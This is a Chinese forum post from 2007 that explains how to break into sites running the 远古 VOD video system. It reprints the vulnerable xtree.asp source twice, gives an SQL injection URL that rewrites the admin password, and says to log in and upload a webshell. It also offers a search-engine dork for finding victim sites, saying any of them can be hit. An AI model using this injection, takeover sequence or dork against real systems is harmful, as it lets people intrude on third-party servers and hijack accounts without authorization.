服务器维护,服务器代维,安全设置,漏洞扫描,入侵检测服务

运维之家

 找回密码
 注册
搜索
查看: 5790|回复: 1

最新远古VOD点播影视系统模板入侵

[复制链接]
dirtysea 发表于 2007-10-9 19:54:56 | 显示全部楼层 |阅读模式

漏洞文件webmedia/common/function/xtree.asp
〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")
if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session

("VODAdmin")) > 0 then
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" &

iNode_ID
else
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" &

iNode_ID
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close
Response.CharSet = "GB2312"
Response.C
Response.Expires = -1
Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->
〈!--#include file="../dbcon.inc.asp" -->
〈%
iNode_ID = Request.QueryString("id")
if Len(Session("SuperAdmin")) > 0 or Len(Session("LIVEAdmin")) > 0 or Len(Session

("VODAdmin")) > 0 then
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>=20 AND ParentID=" &

iNode_ID
else
szSQL = "Select Type_ID,ParentID,TypeName FROM TypeInfo Where Type_ID>20 AND ParentID=" &

iNode_ID
end if
rsData.Open szSQL,con,1,3
szRetVar = "<?xml version='1.0' encoding='GB2312'?><Root>"
do while not rsData.EOF
szRetVar = szRetVar & "<TypeInfo>"
szRetVar = szRetVar & "<IDN>" & rsData("Type_ID") & "</IDN>"
szRetVar = szRetVar & "<ParentID>" & rsData("ParentID") & "</ParentID>"
szRetVar = szRetVar & "<TypeName>" & Replace(rsData("TypeName"), "&", "&") & "</TypeName>"
szRetVar = szRetVar & "</TypeInfo>"
rsData.MoveNext
loop
szRetVar = szRetVar & "</Root>"
rsData.Close
Response.CharSet = "GB2312"
Response.C
Response.Expires = -1
Response.Write szRetVar
%>
〈!--#include file="../dbend.inc.asp" -->
很容易看出以上存在着DB权限注入
注射地址:http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1
表段名:customer
构造函数 把admin的pass改成fuck
http://WWWW.XXXXX.COM/webmedia/common/function/xtree.asp?id=1;update%20customer%20set%20UserPass='633f94d350db34d5'%20where%20UserName='admin'

登陆后台http://WWWW.XXXXX.COM/webmedia/admin/default.asp 直接上传大马 完事!
测试方法:在google baidu搜:    inurL:webmedia/       随便找个站都可以入侵
官方地址:http://www.viewgood.com/

wuqing 发表于 2006-6-2 22:55:43 | 显示全部楼层

re:最新远古VOD点播影视系统模板入侵

理解 你的心情!

您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|小黑屋|手机版|Archiver|运维之家

GMT+8, 2024-3-29 23:30 , Processed in 0.088333 second(s), 14 queries .

Powered by Dirtysea

© 2008-2020 Dirtysea.com.

快速回复 返回顶部 返回列表